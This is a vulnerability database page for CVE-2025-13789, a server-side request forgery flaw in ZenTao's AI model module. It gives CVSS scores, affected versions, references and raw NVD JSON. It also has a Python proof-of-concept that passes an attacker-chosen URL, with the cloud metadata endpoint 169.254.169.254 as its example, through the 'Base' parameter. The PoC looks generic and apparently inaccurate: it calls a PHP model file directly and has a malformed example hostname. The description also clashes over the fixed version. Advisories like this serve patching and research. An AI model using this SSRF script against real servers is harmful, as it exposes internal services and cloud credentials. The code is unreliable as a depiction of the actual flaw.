CVE-2025-13789

Description

A vulnerability was found in ZenTao up to 21.7.6-8564. This affects the function makeRequest of the file module/ai/model.php. The manipulation of the argument Base results in server-side request forgery. The attack can be launched remotely. The exploit has been made public and could be used. Upgrading to version 21.7.6 mitigates this issue. It is suggested to upgrade the affected component.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:zentao:zentao:*:*:*:*:*:*:*:* - VULNERABLE

ZenTao <= 21.7.6

ZenTao <= 21.7.6-8564

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

def exploit_srf(target_url, attacker_controlled_url):
    """
    PoC for CVE-2025-13789 - ZenTao SSRF via makeRequest function
    
    Args:
        target_url: Base URL of vulnerable ZenTao instance
        attacker_controlled_url: URL controlled by attacker for SSRF
    """
    # Vulnerable endpoint and parameter
    endpoint = "/module/ai/model.php"
    params = {
        "Base": attacker_controlled_url,  # SSRF payload
        "method": "makeRequest"
    }
    
    try:
        response = requests.get(target_url + endpoint, params=params, timeout=10)
        print(f"[*] Request sent to: {target_url}{endpoint}")
        print(f"[*] Target URL parameter: {attacker_controlled_url}")
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response length: {len(response.text)}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <attacker_url>")
        print(f"Example: python {sys.argv[0]} http://vulnerable-zen tao.com http://169.254.169.254/latest/meta-data/")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker_url = sys.argv[2]
    exploit_srf(target, attacker_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13789
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13789
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13789/
[4] VulDB https://vuldb.com/cve/CVE-2025-13789
[5] https://github.com/ez-lbz/ez-lbz.github.io/issues/2
[6] https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issue-3598317459
[7] https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issuecomment-3540247346
[8] https://vuldb.com/?ctiid.333793
[9] https://vuldb.com/?id.333793
[10] https://vuldb.com/?submit.690728
[11] https://www.zentao.net/extension-viewext-6.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13789", "sourceIdentifier": "[email protected]", "published": "2025-11-30T14:16:29.640", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in ZenTao up to 21.7.6-8564. This affects the function makeRequest of the file module/ai/model.php. The manipulation of the argument Base results in server-side request forgery. The attack can be launched remotely. The exploit has been made public and could be used. Upgrading to version 21.7.6 mitigates this issue. It is suggested to upgrade the affected component."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zentao:zentao:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.7.6", "matchCriteriaId": "817EA443-FA01-43A2-B8A6-A50B88B062F4"}]}]}], "references": [{"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issue-3598317459", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/ez-lbz/ez-lbz.github.io/issues/2#issuecomment-3540247346", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.333793", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333793", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.690728", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zentao.net/extension-viewext-6.html", "source": "[email protected]", "tags": ["Product"]}]}}